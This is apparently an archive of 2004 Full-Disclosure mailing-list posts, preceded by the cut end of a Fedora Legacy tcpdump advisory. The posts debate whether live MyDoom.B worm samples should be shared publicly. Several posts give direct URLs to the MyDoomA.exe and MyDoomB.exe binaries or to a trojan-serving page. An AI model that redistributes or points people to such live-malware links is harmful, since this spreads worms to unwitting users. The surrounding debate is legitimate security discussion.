wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/download for directions on how to configure yum and apt-get. 5. Bug IDs fixed: http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80 6. RPMs required: Red Hat Linux 7.2: SRPMS: http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm Red Hat Linux 7.3: SRPMS: http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm Red Hat Linux 8.0: SRPMS: http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm 7. Verification: SHA1 sum Package Name - --- a10c0d99cd919f459a25fdb5562d6907667b33d3 7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src
Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron <[EMAIL PROTECTED]> wrote: The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist. The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses. This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again. For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg . Didn't work on my Titanium using Safari. The girl wasuhwell-endowed. :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MyDoom download info
> -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of > Steve Wray > Sent: Sunday, 1 February 2004 10:46 a.m. > To: 'Paul Schmehl'; [EMAIL PROTECTED] > Subject: RE: [Full-Disclosure] MyDoom download info > > If a virus could spread slowly but stealthily, it could be all over > the planet and activated before any antivirus vendor became aware > of its presence and came out with a fix; it wouldn't matter much > if it took a year of quiet spreading. Nah, that would work if there were no honeypots. I'm sure that 99% of AV companies, as well as numerous other security companies/individuals run honeypots and they would catch this pretty quickly as your worm can't know what's honeypot and what isn't (I'm not going into honeypot detection techniques now). Therefore, the only way for a worm to be successful is to spread as fast as it can, what in turn results in disruptions of service for host machine and easier detection. Cheers, Bojan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
On Sun, 01 Feb 2004 10:46:09 +1300, Steve Wray <[EMAIL PROTECTED]> said: > but to address the points, as one person wrote, its difficult to spread > fast when you are trying to be stealthy; I would argue that if one is > stealthy enough, one doesn't need to spread fast since one is trying to > evade detection rather than evading elimination. Very true... > If a virus could spread slowly but stealthily, it could be all over > the planet and activated before any antivirus vendor became aware > of its presence and came out with a fix; it wouldn't matter much > if it took a year of quiet spreading. On the other hand, it severely limits your growth potential. If you go for a spread-fast strategy, you *will* set off all the white hat's detectors (on sheer unexpected traffic volume, if nothing else). You then have 100 white hats all starting from ground zero in analyzing the critter, and you're basically limited to however many systems you can nail in 8 hours before they get a signature out the door. But since you're spreading fast, that's still a lot of systems. What I probably didn't make clear enough the first time I said it was that if you're propagating slowly, you need to be *very* careful - all it takes is for you to hit *one* wrong IDS or honeypot and you've been spotted. And more importantly for the discussion, even if it takes that researcher a week of evening and lunch hours to figure out what you're up to, you won't have gotten many more systems during that week. Consider that a fast-spreading worm can nail several million boxes, while the average IRC botnet built more stealthily is in the several 10K range. > Sometimes (and here I go sounding paranoid again) it seems that the > viruses and worms we see are nothing but a smokescreen; they are > SO VERY obvious. Welcome to the club. Want some tinfoil? :) pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] MyDoom download info
Roland Dobbins <[EMAIL PROTECTED]> wrote: > I know Dan Spisak personally, and can vouch for his honesty and > integrity. And _you_ are??? It seems you largely missed the point. ... Anyway, it is interesting to know that Cisco employs people who think there is integrity in both publicly distributing viruses, and doing so after repackaging them with a "dropper" that makes them not immediately detectible. -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
Hallo Steve, * Steve Wray <[EMAIL PROTECTED]> [2004-01-31 23:00]: > > You can always disassemble the virus, which is what people > > will do if it's a real "popular" one such as MyDoom. > > IIRC there are viruses that are encrypted and are almost impossible > to disassemble? > > Would that be true? i think not forever. there is a good phrack article about binary encription. nico -- Nico Golde nico ngolde de public key available on: http://www.ngolde.de/gpg.html pgp0.pgp Description: PGP signature
Re[2]: [Full-Disclosure] MyDoom download info
NF>that x employs people who think NF>there is integrity in both publicly NF>distributing viruses I read F u l l - D i s c l o s u r e not restricted Disclosure. I applaud the person who posted the B variant, for me the only chance to "analyse" that one. NF> after repackaging them with a "dropper" that makes them not immediately NF> detectible. Let's call this "NAME of File" detection, shall we? It goes like this : MyDoomA.exe = MyDoomA virus - MyDoomB.exe = MyDoomB virus Quit the whining and post something productive. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MyDoom.b samples taken down
Hi Daniel, That's unbelievable and incredibly lame of McAfee!! Are we supposed to sit and wait for our free copies to be delivered to us by the very people we are trying to stop from getting infected??? I have copied the files to the following locations: http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe Mike -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Daniel Spisak Sent: Sunday, February 01, 2004 10:38 AM To: [Full Disclosure] Subject: [Full-Disclosure] MyDoom.b samples taken down -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I have been asked by McAfee to take down my copy of MyDoom.B as they have insinuated that I am now responsible for this virus spreading. Sorry guys, I tried to help people out here but it would seem greater powers are at work here. Don't email me asking for copies as I won't be giving any more out. I suggest you direct future request for this virus towards McAfee, perhaps in their infinite wisdom they will be willing to help other researchers. Daniel E. Spisak Security Engineer OnlineSecurity www.onlinesecurity.com [EMAIL PROTECTED] Cell: 562.331.1603 -BEGIN PGP SIGNATURE- Version: PGP 8.0.3 iQA/AwUBQBwgKRUn/Hz8mr7jEQJuXQCeJP6dhDigNBmJRZ29spqDOpExQrYAoMyC 7eyngBEgA4TEOEmV1DIzlMNk =A6V6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MyDoom.b samples taken down
On Sun, 2004-02-01 at 06:08, Mike wrote: > I have copied the files to the following locations: > http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe > http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe And so the virus spreads again. and by means not anticipated by its author... Spreading via search engines, and infecting people wanting to download the Doom sequel... When posting viruses, may I suggest a mechanism that forces someone to manually click on a button or enter a number or something? Anything that prevents automatic download from a URL. Otherwise your web space might be misused by MyDoomC as a download point. Regards, Frank signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] Re: Script Kiddies
On Sat, 31 Jan 2004 09:35:13 PST, [EMAIL PROTECTED] said: > The only difference between a 'script kiddie' and 90% of the 'security > experts' out there are the tools they use. Damn, I've been outed. The average script kiddie probably has more exploits on their hard drive than I do, I must be a Ted Sturgeon expert pgp0.pgp Description: PGP signature
Re[2]: [Full-Disclosure] MyDoom download info
On Sun, 1 Feb 2004, Thierry wrote: > NF>that x employs people who think > NF>there is integrity in both publicly > NF>distributing viruses > > I read F u l l - D i s c l o s u r e > not restricted Disclosure. Exactly. > Quit the whining and post something productive. Here here! -- Yours, J.A. Terranson [EMAIL PROTECTED] "Unbridled nationalism, as distinguished from a sane and legitimate patriotism, must give way to a wider loyalty, to the love of humanity as a whole. Bah'u'llh's statement is: "The earth is but one country, and mankind its citizens." The Promise of World Peace http://www.us.bahai.org/interactive/pdaFiles/pwp.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MyDoom.B
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Look, apparently this is not the list for me to be on. All I was trying to do at first was find B to analyze. Then I tried to provide it to people via email but that quickly escalated past what I could personally handle by myself. Then I gave the URL to the list and now we have this fine mess. McAfee was just trying to give me a friendly nudge that what I did was probably not the best method of distribution. So try to not harbor any ill will towards them, they were just trying to do their job. I overreacted and it would seem this situation would dearly like to spiral out of control. I never wished to drag people I know needlessly into a pissing match. Nor did I ever wish to intend to make this variant more active in the wild. If you are mirroring the files I had previously hosted please take them down from your sites and distribute them via email only if at all possible. Posting the virus to a URL on this list means it ends up on the web archive which means it shows up in Google which means any Tom, Dick, or Jane can download the live virus. So if you wish to help others email is the way I suggest. Anyways, I'm going to shut the hell up now for a while and hope that what sanity is left can prevail here. Daniel E. Spisak Security Engineer OnlineSecurity www.onlinesecurity.com [EMAIL PROTECTED] Cell: 562.331.1603 -BEGIN PGP SIGNATURE- Version: PGP 8.0.3 iQA/AwUBQBxKORUn/Hz8mr7jEQJvJQCfdGYHvz5Qlgd76ztAGqHFN7LwuOYAoK3w qJ8Lx50TPcv9mk1bDWh3HmTu =RQDD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.B
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Saturday 31 January 2004 16:37, Daniel Spisak wrote: > Look, apparently this is not the list for me to be on. All I was trying > to do at first was find B to analyze. Then I tried to provide it to > people via email but that quickly escalated past what I could > personally handle by myself. Then I gave the URL to the list and now we > have this fine mess. McAfee was just trying to give me a friendly nudge > that what I did was probably not the best method of distribution. So > try to not harbor any ill will towards them, they were just trying to > do their job. I overreacted and it would seem this situation would > dearly like to spiral out of control. I never wished to drag people I > know needlessly into a pissing match. Nor did I ever wish to intend to > make this variant more active in the wild. You want a job with NA someday? Not that there's anything /wrong/ with that! base-64 'em, and post with with an adequate warning - to this list. They'll be web-archived within minutes anyway. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAHFVVJi2cv3XsiSARAjGaAJ429/SfuaY6O663VEeyObLyqpIzjQCg24l4 i3EQRPe9ZF63i8sWhquVXpU= =IbcU -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.b samples taken down
Mike wrote: That's unbelievable and incredibly lame of McAfee!! Are we supposed to sit and wait for our free copies to be delivered to us by the very people we are trying to stop from getting infected??? Daniel and Mike, thanks for making those files available for those of us who wish to research this virus firsthand, instead of relying on (sometimes) wildly innacurate media and "expert" reporting. Shame on McAfee for succeeding in intimidating a fellow researcher - I guess that's what happens when viruses become Big Business; use whatever FUD is available to limit your competitio, increase market share and maximize shareholder value. Foo. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.b samples taken down
Kurt Weiske <[EMAIL PROTECTED]> wrote: > Daniel and Mike, thanks for making those files available for those of us > who wish to research this virus firsthand, instead of relying on > (sometimes) wildly innacurate media and "expert" reporting. > > Shame on McAfee for succeeding in intimidating a fellow researcher - I It seems that "intimidation" may have been too strong a word -- see Daniel's latest post -- but whatever... > guess that's what happens when viruses become Big Business; use whatever > FUD is available to limit your competitio, increase market share and > maximize shareholder value. Foo. No -- that's what happens when you actually have half a clue about the huge _further_ damage such things can do if actually successfully distributed. Mydoom.B has largely _not_ taken off, but all it probably needs is a touch of the usual "luck" which is all that distinguishes most successful mass-mailers from the huge numbers of unsuccessful ones lamers, like those on this list clamouring to get a Mydoom.B sample, never see. I know most of you will not believe this because you so stupid you already believe that live virus samples are _just_ information and therefore _should_ be subject to "full disclosure" (this is a special form of ignorance that very little empirical evidence seems able to budge -- at least until a holder of the ignorance is the person bitten by it), _but_ each extra copy of Mydoom.B downloaded from the various URLs published on this list increases the likelihood that the virus writer will have his "glory" with the Mydoom.B variant as well. The cost of that far outweighs the value of the jollies a few of you will get from working out how to unpack the "hacked" UPX compression used, poking a few clever comments into your disasm, or mastering ROT13 to "decrypt" the virus' internal strings. In the process, some of you will run it in a VM connected via virtual network to the real Internet (because you are so stupid you believe that "because you run Linux you are safe" or you forgot you enabled bridged networking for some "special reason" and never got round to disabling it) and more copies of it will "escape" (we see this often). And you want to subject the world to that threat because you want to spend hours and hours doing what has been done "well enough" in multiple professional security company labs for them to ship detection and repair utilities within minutes to an hour or two of first receiving a sample of it several days ago. Get real... Try handling dozens of these a day and then see what you feel about the quality of the work of those labs and that 'wildly innacurate [...] "expert" reporting' And save me the almost inevitable full-disclosure mantra BS replies! I really do not want to hear your ignorance rephrased that way, again -- at least walk the walk before you try to talk the talk... -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]
Ergh - the http://207.46.110.24/gateway/gateway.dll? address is only a MSN MSGR site - sorry. Dan -Forwarded Message- From: Paul Schmehl <[EMAIL PROTECTED]> To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story Date: 31 Jan 2004 14:24:21 -0600 --On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron <[EMAIL PROTECTED]> wrote: > The past Trojan horses which spread this way took advantage of the fact > web servers send an HTML 404 message if a file doesn't exist. > > The original sample - britney.jpg - was simply an html file itself, and > using that fact, and IE loading it. It was combined with one of the > latest exploits of the time (I don't think MS patched it yet), and > downloaded the Trojan horses. > > This time around there is actually a picture on the web page, of a real > honest to God girl. But in another frame.. the same story all over again. > > For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg . Didn't work on my Titanium using Safari. The girl wasuhwell-endowed. :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]
Doesn't work in Mozilla v1.3.1 on Xandros v1.1 either, though the message was "(111) Connection refused" by http://mitglied.lycos.de/mycutewebspace, maybe they don't like Mozilla? :-) Our proxy shows the following path when you click the link: http://freedns.afraid.org/blank.html http://mitglied.lycos.de/mycutewebspace http://207.46.110.24/gateway/gateway.dll? Cheers, Dan -Forwarded Message- From: Paul Schmehl <[EMAIL PROTECTED]> To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story Date: 31 Jan 2004 14:24:21 -0600 --On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron <[EMAIL PROTECTED]> wrote: > The past Trojan horses which spread this way took advantage of the fact > web servers send an HTML 404 message if a file doesn't exist. > > The original sample - britney.jpg - was simply an html file itself, and > using that fact, and IE loading it. It was combined with one of the > latest exploits of the time (I don't think MS patched it yet), and > downloaded the Trojan horses. > > This time around there is actually a picture on the web page, of a real > honest to God girl. But in another frame.. the same story all over again. > > For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg . Didn't work on my Titanium using Safari. The girl wasuhwell-endowed. :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
Please allow me to clarify - I merely intended to indicate that I know Dan to be a man of personal and professional integrity, no endorsement of the practice was intended, sorry for any confusion. On Jan 31, 2004, at 2:54 PM, Nick FitzGerald wrote: Roland Dobbins <[EMAIL PROTECTED]> wrote: I know Dan Spisak personally, and can vouch for his honesty and integrity. And _you_ are??? It seems you largely missed the point. ... Anyway, it is interesting to know that Cisco employs people who think there is integrity in both publicly distributing viruses, and doing so after repackaging them with a "dropper" that makes them not immediately detectible. -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html - Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.b samples taken down
Nick FitzGerald wrote: I know most of you will not believe this because you so stupid you already believe that live virus samples are _just_ information and therefore _should_ be subject to "full disclosure" (this is a special form of ignorance that very little empirical evidence seems able to budge Before I make a judgement here, are you against publishing the virus in executable form that could be accidentally launched, or against publishing the virus in any form? If the latter, then perhaps you might find other mailing lists with a more sympathetic audience. If the former, after consideration, I agree. Handling a live virus is akin to handling their real-world counterparts, and having some protection against accidentally launching it on a production system is a Good Thing. I've renamed mine to a non-executable extension, and they're off my production boxes. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.b samples taken down
On Sun, 1 Feb 2004, Nick FitzGerald wrote: > of it will "escape" (we see this often). And you want to subject the > world to that threat because you want to spend hours and hours doing > what has been done "well enough" in multiple professional security > company labs for them to ship detection and repair utilities within > minutes to an hour or two of first receiving a sample of it several > days ago. Get real... This is just so arrogant as to be unreal. And how do you suppose those "experts" got to be that way? You wouldn't happen to work in the field, would you, Nick? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.b samples taken down
Nick FitzGerald wrote: And save me the almost inevitable full-disclosure mantra BS replies! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html heh. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom.b samples moved
> > Nick FitzGerald wrote: > > > And save me the almost inevitable full-disclosure mantra > BS replies! > > > ___ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.netsys.com/full-disclosure-charter.html > > heh. > > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.netsys.com/full-disclosure-charter.html Due to "popular demand" I've moved the files. http://homepages.ihug.co.nz/~mjcarter/ You'll have to scroll to the bottom of the page and click on a link. Mike ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html